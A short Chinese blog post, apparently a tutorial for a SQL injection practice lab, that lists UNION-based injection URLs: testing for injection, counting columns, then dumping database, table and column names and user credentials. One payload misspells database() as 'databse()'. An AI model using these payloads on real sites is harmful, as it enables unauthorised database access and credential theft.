常规sql注入

文章提供了一系列URL示例,用于测试SQL注入漏洞,包括检查注入存在的基础测试,如1=1,通过orderby字段测试回显,利用unionselect来爆库和数据表,以及获取特定表的字段值。这些方法揭示了Web应用程序可能存在的安全问题。
摘要由CSDN通过智能技术生成

常规SQL注入
测试是否存在SQL注入http://123.1.1.1:1111/less/?id=1’ and 1=1 ;%00
测试字段http://123.1.1.1:1111/less/?id=1’ order by 3 ;%00
测试回显字段http://123.1.1.1:1111/less/?id=1’ union select 1,2,3 ;%00
爆数据库http://123.1.1.1:1111/less/?id=1’ union select 1,database(),3 ;%00
爆数据表http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(table_name),3from information_schema.tables where table_schema=databse() ;%00
爆数据表字段http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(column_name),3from information_schema.columns where table_name=“123” ;%00
获取字段值http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(id,username,password),3 from user ;%00
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值